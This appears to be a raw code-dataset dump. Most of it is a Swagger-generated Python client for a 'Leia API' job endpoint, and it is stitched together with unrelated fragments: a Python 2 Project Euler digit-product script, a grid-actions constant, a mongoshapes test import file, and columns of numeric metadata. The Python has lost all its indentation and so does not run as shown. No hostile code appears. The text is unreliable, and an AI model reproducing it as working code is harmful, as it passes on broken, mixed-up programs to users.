OpenAPI spec version: 1.0.0
Contact: contact@leia.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from leiaapi.generated.api_client import ApiClient
class JobApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def cancel_job(self, token, job_id, **kwargs): # noqa: E501
"""Cancels a job in Leia API # noqa: E501
Cancels a job in Leia API (This will not really delete it, just mark it as cancelled, so dependent jobs will fail) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_job(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cancel_job_with_http_info(token, job_id, **kwargs) # noqa: E501
else:
(data) = self.cancel_job_with_http_info(token, job_id, **kwargs) # noqa: E501
return data
def cancel_job_with_http_info(self, token, job_id, **kwargs): # noqa: E501
"""Cancels a job in Leia API # noqa: E501
Cancels a job in Leia API (This will not really delete it, just mark it as cancelled, so dependent jobs will fail) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_job_with_http_info(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `cancel_job`") # noqa: E501
# verify the required parameter 'job_id' is set
if ('job_id' not in params or
params['job_id'] is None):
raise ValueError("Missing the required parameter `job_id` when calling `cancel_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'job_id' in params:
path_params['job_id'] = params['job_id'] # noqa: E501
query_params = []
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job/{job_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_conditional_job(self, token, execute_after_id, **kwargs): # noqa: E501
"""Asynchronously and conditionaly applies model(s) on documents # noqa: E501
Asynchronously runs one or more list of jobs on accessible documents and returns a Job.<br /> The list of jobs to run and the documents on which they should be run will be chosen depending on the rules parameter that is set in the body of the request and the result of the execute_after_id job.<br /> Rules should be a map[string,object] where the key is a user chosen id and the value is a list of objects containing the same parameters as normal calls to /model/{model_id}/apply{document_ids} or /document/{document_ids}/transform/{output_type} and a conditions field.<br /> If all the field/values in the conditions of a rule are contained as is in the result of the execute_after_id job, then the list of jobs will be executed in order with the given parameters, each job depending on the previous one in the list, else it won't be executed at all<br /> Syntax for conditions is as follows: * \"field_name\" : value In which case the field field_name must be equal to the value for the job to be executed. value can be any valid json type (int, float, string...) * \"field_name\": {\"operator\" : value} Where operator is a [Mongo like comparison operator](https://docs.mongodb.com/manual/reference/operator/query-comparison/). In this case the comparison between field field_name's value must be true for the job to be executed. value can be any valid json type (int, float, string...) * \"field_name\": [{\"operator_1\" : value_1}...{\"operator_n\" : value_n}] Where operator_i is a [Mongo like comparison operator](https://docs.mongodb.com/manual/reference/operator/query-comparison/). In this case the comparison between field field_name's value must be true for all items in the list for the job to be executed. value_i can be any valid json type (int, float, string...). {\"$eq\" : value_i} can be abbreviated as value_i in the list. You can keep the document_ids field of any job empty apart for the first job of a rule. If it is, the job will use the results of previous job's as an input if no tag is set, or the document_ids of the execute_after_id job + tag if tag is set.<br /> If the conditions are not mutually exclusive, 2 or more models may be executed.<br /> The result will be sent back as a map of results where the key is the rule id, and containing one entry for list of jobs that was executed. This entry will contain all the results of the executed jobs, in execution order<br /> This is mostly but not necessarily meant to be used after a classifier model, so that an execution path can be chosen automatically depending on the result of the classification. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_conditional_job(token, execute_after_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str execute_after_id: The id of a job that must be in PROCESSED status before this one can be started (used to chain jobs even before the first ones are terminated). If the referenced job becomes FAILED or is CANCELED, this one will fail (required)
:param ConditionalBody body: Contains the rules to choose the model to apply. All the previous query parameters can also be passed as JSON in the body of the request
:param str callback_url: Callback URL that should be called when the job becomes PROCESSED/FAILED/CANCELED. This URL will be called with a HTTP POST method, and the Job object as the payload. Callback server must answer with either a 200 or 204 HTTP response, to acknowledge the callback. Any other response code will be considered as a failure to call the callback.
:param bool block_processing: If true, blocks processing on the job until /job/{id}/start is called. Default is false
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_conditional_job_with_http_info(token, execute_after_id, **kwargs) # noqa: E501
else:
(data) = self.create_conditional_job_with_http_info(token, execute_after_id, **kwargs) # noqa: E501
return data
def create_conditional_job_with_http_info(self, token, execute_after_id, **kwargs): # noqa: E501
"""Asynchronously and conditionaly applies model(s) on documents # noqa: E501
Asynchronously runs one or more list of jobs on accessible documents and returns a Job.<br /> The list of jobs to run and the documents on which they should be run will be chosen depending on the rules parameter that is set in the body of the request and the result of the execute_after_id job.<br /> Rules should be a map[string,object] where the key is a user chosen id and the value is a list of objects containing the same parameters as normal calls to /model/{model_id}/apply{document_ids} or /document/{document_ids}/transform/{output_type} and a conditions field.<br /> If all the field/values in the conditions of a rule are contained as is in the result of the execute_after_id job, then the list of jobs will be executed in order with the given parameters, each job depending on the previous one in the list, else it won't be executed at all<br /> Syntax for conditions is as follows: * \"field_name\" : value In which case the field field_name must be equal to the value for the job to be executed. value can be any valid json type (int, float, string...) * \"field_name\": {\"operator\" : value} Where operator is a [Mongo like comparison operator](https://docs.mongodb.com/manual/reference/operator/query-comparison/). In this case the comparison between field field_name's value must be true for the job to be executed. value can be any valid json type (int, float, string...) * \"field_name\": [{\"operator_1\" : value_1}...{\"operator_n\" : value_n}] Where operator_i is a [Mongo like comparison operator](https://docs.mongodb.com/manual/reference/operator/query-comparison/). In this case the comparison between field field_name's value must be true for all items in the list for the job to be executed. value_i can be any valid json type (int, float, string...). {\"$eq\" : value_i} can be abbreviated as value_i in the list. You can keep the document_ids field of any job empty apart for the first job of a rule. If it is, the job will use the results of previous job's as an input if no tag is set, or the document_ids of the execute_after_id job + tag if tag is set.<br /> If the conditions are not mutually exclusive, 2 or more models may be executed.<br /> The result will be sent back as a map of results where the key is the rule id, and containing one entry for list of jobs that was executed. This entry will contain all the results of the executed jobs, in execution order<br /> This is mostly but not necessarily meant to be used after a classifier model, so that an execution path can be chosen automatically depending on the result of the classification. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_conditional_job_with_http_info(token, execute_after_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str execute_after_id: The id of a job that must be in PROCESSED status before this one can be started (used to chain jobs even before the first ones are terminated). If the referenced job becomes FAILED or is CANCELED, this one will fail (required)
:param ConditionalBody body: Contains the rules to choose the model to apply. All the previous query parameters can also be passed as JSON in the body of the request
:param str callback_url: Callback URL that should be called when the job becomes PROCESSED/FAILED/CANCELED. This URL will be called with a HTTP POST method, and the Job object as the payload. Callback server must answer with either a 200 or 204 HTTP response, to acknowledge the callback. Any other response code will be considered as a failure to call the callback.
:param bool block_processing: If true, blocks processing on the job until /job/{id}/start is called. Default is false
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'execute_after_id', 'body', 'callback_url', 'block_processing'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_conditional_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `create_conditional_job`") # noqa: E501
# verify the required parameter 'execute_after_id' is set
if ('execute_after_id' not in params or
params['execute_after_id'] is None):
raise ValueError("Missing the required parameter `execute_after_id` when calling `create_conditional_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'execute_after_id' in params:
path_params['execute_after_id'] = params['execute_after_id'] # noqa: E501
query_params = []
if 'callback_url' in params:
query_params.append(('callback_url', params['callback_url'])) # noqa: E501
if 'block_processing' in params:
query_params.append(('block_processing', params['block_processing'])) # noqa: E501
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job/conditional/{execute_after_id}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Job', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job(self, token, job_id, **kwargs): # noqa: E501
"""Retrieves a job from Leia API # noqa: E501
Retrieves a job from Leia API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to retrieve (required)
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_with_http_info(token, job_id, **kwargs) # noqa: E501
else:
(data) = self.get_job_with_http_info(token, job_id, **kwargs) # noqa: E501
return data
def get_job_with_http_info(self, token, job_id, **kwargs): # noqa: E501
"""Retrieves a job from Leia API # noqa: E501
Retrieves a job from Leia API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_with_http_info(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to retrieve (required)
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `get_job`") # noqa: E501
# verify the required parameter 'job_id' is set
if ('job_id' not in params or
params['job_id'] is None):
raise ValueError("Missing the required parameter `job_id` when calling `get_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'job_id' in params:
path_params['job_id'] = params['job_id'] # noqa: E501
query_params = []
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job/{job_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Job', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_statuses(self, token, job_ids, **kwargs): # noqa: E501
"""Retrieves job statuses from Leia API # noqa: E501
Retrieves a list of job statuses from Leia API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_statuses(token, job_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param list[str] job_ids: The ids of the jobs to retrieve, comma separated (required)
:return: dict(str, Statuses)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_statuses_with_http_info(token, job_ids, **kwargs) # noqa: E501
else:
(data) = self.get_job_statuses_with_http_info(token, job_ids, **kwargs) # noqa: E501
return data
def get_job_statuses_with_http_info(self, token, job_ids, **kwargs): # noqa: E501
"""Retrieves job statuses from Leia API # noqa: E501
Retrieves a list of job statuses from Leia API # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_statuses_with_http_info(token, job_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param list[str] job_ids: The ids of the jobs to retrieve, comma separated (required)
:return: dict(str, Statuses)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'job_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_statuses" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `get_job_statuses`") # noqa: E501
# verify the required parameter 'job_ids' is set
if ('job_ids' not in params or
params['job_ids'] is None):
raise ValueError("Missing the required parameter `job_ids` when calling `get_job_statuses`") # noqa: E501
collection_formats = {}
path_params = {}
if 'job_ids' in params:
path_params['job_ids'] = params['job_ids'] # noqa: E501
collection_formats['job_ids'] = '' # noqa: E501
query_params = []
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job/{job_ids}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, Statuses)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_jobs(self, token, **kwargs): # noqa: E501
"""Retrieves jobs (paginated) # noqa: E501
Get jobs from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jobs(token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job
:param str application_id: The id of the owner of the documents processed by this job
:param JobTypes job_type: The type of the job (predict, pdf-images, image-text or transform)
:param str model_id: The model used by the job (only for predict jobs)
:param str document_id: The document that this the job is processing
:param str execute_after_id: The job that is a prerequisite for this job to run
:param str parent_job_id: The job that is the parent of this job
:param Statuses status: The status of the job
:param datetime created_after: If specified, keeps only jobs created after given UTC timestamp (ISO 8601 format : yyyy-MM-ddThh:mm:ss)
:param datetime created_before: If specified, keeps only jobs created before given UTC timestamp (ISO 8601 format : yyyy-MM-ddThh:mm:ss)
:param str sort: If specified, sorts the jobs by a list of existing parameters separated by commas. Can be 'submitter_id', 'application_id', 'creation_time', 'starting_time', 'finished_time', 'job_type', 'model_id', 'document_ids', 'status', 'parent_job_id'. Sorts in ascending order by default. If a parameter is preceded by '-', it is sorted in descending order.
:param int offset: Number of the first job to send (pagination)
:param int limit: Maximum number of jobs to send (pagination)
:return: list[Job]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_jobs_with_http_info(token, **kwargs) # noqa: E501
else:
(data) = self.get_jobs_with_http_info(token, **kwargs) # noqa: E501
return data
def get_jobs_with_http_info(self, token, **kwargs): # noqa: E501
"""Retrieves jobs (paginated) # noqa: E501
Get jobs from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jobs_with_http_info(token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job
:param str application_id: The id of the owner of the documents processed by this job
:param JobTypes job_type: The type of the job (predict, pdf-images, image-text or transform)
:param str model_id: The model used by the job (only for predict jobs)
:param str document_id: The document that this the job is processing
:param str execute_after_id: The job that is a prerequisite for this job to run
:param str parent_job_id: The job that is the parent of this job
:param Statuses status: The status of the job
:param datetime created_after: If specified, keeps only jobs created after given UTC timestamp (ISO 8601 format : yyyy-MM-ddThh:mm:ss)
:param datetime created_before: If specified, keeps only jobs created before given UTC timestamp (ISO 8601 format : yyyy-MM-ddThh:mm:ss)
:param str sort: If specified, sorts the jobs by a list of existing parameters separated by commas. Can be 'submitter_id', 'application_id', 'creation_time', 'starting_time', 'finished_time', 'job_type', 'model_id', 'document_ids', 'status', 'parent_job_id'. Sorts in ascending order by default. If a parameter is preceded by '-', it is sorted in descending order.
:param int offset: Number of the first job to send (pagination)
:param int limit: Maximum number of jobs to send (pagination)
:return: list[Job]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'job_id', 'application_id', 'job_type', 'model_id', 'document_id', 'execute_after_id', 'parent_job_id', 'status', 'created_after', 'created_before', 'sort', 'offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `get_jobs`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'job_id' in params:
query_params.append(('job_id', params['job_id'])) # noqa: E501
if 'application_id' in params:
query_params.append(('application_id', params['application_id'])) # noqa: E501
if 'job_type' in params:
query_params.append(('job_type', params['job_type'])) # noqa: E501
if 'model_id' in params:
query_params.append(('model_id', params['model_id'])) # noqa: E501
if 'document_id' in params:
query_params.append(('document_id', params['document_id'])) # noqa: E501
if 'execute_after_id' in params:
query_params.append(('execute_after_id', params['execute_after_id'])) # noqa: E501
if 'parent_job_id' in params:
query_params.append(('parent_job_id', params['parent_job_id'])) # noqa: E501
if 'status' in params:
query_params.append(('status', params['status'])) # noqa: E501
if 'created_after' in params:
query_params.append(('created_after', params['created_after'])) # noqa: E501
if 'created_before' in params:
query_params.append(('created_before', params['created_before'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Job]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def start_job(self, token, job_id, **kwargs): # noqa: E501
"""Starts a job in BLOCKED status within Leia API # noqa: E501
Triggers a job in BLOCKED status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_job(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to start (required)
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.start_job_with_http_info(token, job_id, **kwargs) # noqa: E501
else:
(data) = self.start_job_with_http_info(token, job_id, **kwargs) # noqa: E501
return data
def start_job_with_http_info(self, token, job_id, **kwargs): # noqa: E501
"""Starts a job in BLOCKED status within Leia API # noqa: E501
Triggers a job in BLOCKED status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_job_with_http_info(token, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str token: The login token obtained via GET /login/{api_key} (required)
:param str job_id: The id of the job to start (required)
:return: Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['token', 'job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method start_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'token' is set
if ('token' not in params or
params['token'] is None):
raise ValueError("Missing the required parameter `token` when calling `start_job`") # noqa: E501
# verify the required parameter 'job_id' is set
if ('job_id' not in params or
params['job_id'] is None):
raise ValueError("Missing the required parameter `job_id` when calling `start_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'job_id' in params:
path_params['job_id'] = params['job_id'] # noqa: E501
query_params = []
header_params = {}
if 'token' in params:
header_params['token'] = params['token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/job/{job_id}/start', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Job', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 53.066291
| 2,615
| 0.643127
| 5,099
| 37,624
| 4.572073
| 0.070798
| 0.038433
| 0.017415
| 0.01853
| 0.939218
| 0.926822
| 0.907991
| 0.892678
| 0.887702
| 0.879252
| 0
| 0.013804
| 0.27028
| 37,624
| 708
| 2,616
| 53.141243
| 0.835331
| 0.495083
| 0
| 0.717678
| 1
| 0
| 0.201072
| 0.030092
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034301
| false
| 0
| 0.010554
| 0
| 0.094987
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ca5f452ce5ca4c674e94ed5f87ff51d310c0168c
| 1,662
|
py
|
Python
|
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
c8/c8.py
|
avnish19/project-euler
|
263d60a133174d72e8117671ca61b41156a70191
|
[
"Unlicense"
] | null | null | null |
import sys
#!/usr/bin/python
def prod_of_string(input_string):
"""Calculates the cumulative product of all digits present in the input string"""
prod = 1
for digit in input_string:
prod *= int(digit)
return prod
NUM_TO_SEARCH = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
LENGTH_TO_SEARCH = int(sys.argv[1])
max_product = 0
max_substring = '0'
for start_index in range(0, len(NUM_TO_SEARCH) - LENGTH_TO_SEARCH, +1):
substring = NUM_TO_SEARCH[start_index:start_index + LENGTH_TO_SEARCH]
prod = prod_of_string(substring)
if prod > max_product:
max_product = prod
max_substring = substring
print max_substring, "produces product", max_product
| 53.612903
| 1,018
| 0.883875
| 99
| 1,662
| 14.555556
| 0.393939
| 0.03331
| 0.022901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.658808
| 0.081227
| 1,662
| 30
| 1,019
| 55.4
| 0.284872
| 0.009627
| 0
| 0
| 0
| 0
| 0.650256
| 0.639386
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.058824
| null | null | 0.058824
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0468189b571100d066abd9af4a99d251fb2cb29b
| 53
|
py
|
Python
|
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | 1
|
2021-11-22T17:30:33.000Z
|
2021-11-22T17:30:33.000Z
|
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | null | null | null |
sample_envs/gridnav/constants/actions.py
|
ericyangyu/DeMAC
|
25e0520e5b4ab3514992fd5b505af283504a80b2
|
[
"MIT"
] | null | null | null |
ACTIONS = [(0, -1), (-1, 0), (0, 1), (1, 0), (0, 0)]
| 26.5
| 52
| 0.320755
| 11
| 53
| 1.545455
| 0.272727
| 0.352941
| 0.352941
| 0.470588
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243902
| 0.226415
| 53
| 1
| 53
| 53
| 0.170732
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
047d59d634e2b8ccd907072d7a6b47efc764c9e5
| 181
|
py
|
Python
|
tests/func/point/__init__.py
|
phuntimes/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | 1
|
2020-11-26T05:58:23.000Z
|
2020-11-26T05:58:23.000Z
|
tests/func/point/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
tests/func/point/__init__.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from mongoshapes import Point as GeoShape
from mongoshapes import PointDict as GeoDict
from mongoshapes import PointField as GeoField
| 25.857143
| 46
| 0.779006
| 25
| 181
| 5.64
| 0.68
| 0.319149
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.143646
| 181
| 6
| 47
| 30.166667
| 0.903226
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
048dcc587e483f79b7d55cb8208de05012cab15c
| 30,823
|
py
|
